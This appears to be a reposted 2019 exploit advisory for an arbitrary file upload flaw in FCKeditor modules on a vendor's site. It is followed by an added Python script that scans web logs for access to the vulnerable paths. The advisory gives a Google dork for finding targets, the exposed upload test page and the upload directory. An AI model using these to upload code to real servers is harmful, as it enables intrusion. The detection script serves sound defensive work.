Institut VerpackungsMarktForschung GMBH Modules Arbitrary File Upload

CVE: N/A
Category: CWE-264
Price: N/A
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2019-03-28
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030233

Below is a copy:

Institut VerpackungsMarktForschung GMBH Modules Arbitrary File Upload
############################################################################################

# Exploit Title : Institut VerpackungsMarktForschung GMBH Modules Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/03/2019
# Vendor Homepage : ivm-childsafe.de
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : [PDF] inurl:/modules/fck/usr/
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Impact :
***********
Institut VerpackungsMarktForschung GMBH FCKeditor Modules is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process.

This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

############################################################################################

# Arbitrary File Upload / Insert File Exploit :
***************************************
/modules/fck/editor/filemanager/connectors/uploadtest.html

# Directory File Path :
*********************
/modules/fck/usr/[YOURFILENAME].txt .jpg .gif .png

############################################################################################

# Example Vulnerable Sites :
*************************

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

############################################################################################
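
For site operators reviewing their own logs: the sketch below is an added example, not part of the original advisory. It flags requests that touch the connector test page and the upload directory named above. It assumes Combined Log Format; the sample log lines, the IP addresses and the "handler" script name are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Paths and extensions as given in the advisory text.
CONNECTOR_DIR = "/modules/fck/editor/filemanager/connectors/"
TEST_PAGE = CONNECTOR_DIR + "uploadtest.html"
UPLOAD_DIR = "/modules/fck/usr/"
LISTED_EXT = {"txt", "jpg", "gif", "png"}
# Assumption: the web server writes Combined Log Format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(line):
    """Return (client_ip, reason) if the request touches the upload surface, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Drop the query string, decode %xx, fold case and repeated slashes.
    path = unquote(m["target"].split("?", 1)[0]).lower()
    path = re.sub(r"/{2,}", "/", path)
    if path == TEST_PAGE:
        return m["ip"], ("test-page-reachable" if m["status"] == "200" else "test-page-probe")
    if path.startswith(CONNECTOR_DIR) and m["method"] == "POST":
        return m["ip"], "connector-post"
    if path.startswith(UPLOAD_DIR):
        name = path.rsplit("/", 1)[-1]
        segments = name.split(".")[1:]
        # No extension, or any dot segment outside the listed set (e.g. name.php.txt).
        if name and (not segments or any(s not in LISTED_EXT for s in segments)):
            return m["ip"], "unlisted-extension-in-upload-dir"
    return None

def scan(lines):
    findings = {}  # client IP -> reasons, in log order
    for line in lines:
        hit = classify(line)
        if hit:
            findings.setdefault(hit[0], []).append(hit[1])
    return findings

# Constructed sample log (documentation IP ranges; "handler" is a placeholder name).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Mar/2019:10:00:01 +0000] "GET /modules/fck/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [28/Mar/2019:10:00:09 +0000] "POST /modules/fck/editor/filemanager/connectors/handler HTTP/1.1" 200 310 "-" "-"',
    '192.0.2.10 - - [28/Mar/2019:10:00:15 +0000] "GET /modules/fck/usr/notes.php.txt HTTP/1.1" 200 64 "-" "-"',
    '198.51.100.7 - - [28/Mar/2019:10:02:00 +0000] "GET /modules/fck/usr/brochure.png HTTP/1.1" 200 20480 "-" "-"',
    '203.0.113.5 - - [28/Mar/2019:10:03:00 +0000] "GET /Modules/fck/editor/filemanager/connectors/uploadtest.html?x=1 HTTP/1.1" 404 0 "-" "-"',
]
```

A "test-page-reachable" result means the test page is still served and should be removed or access-restricted; names with several legitimate dots will also be flagged and need manual review.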
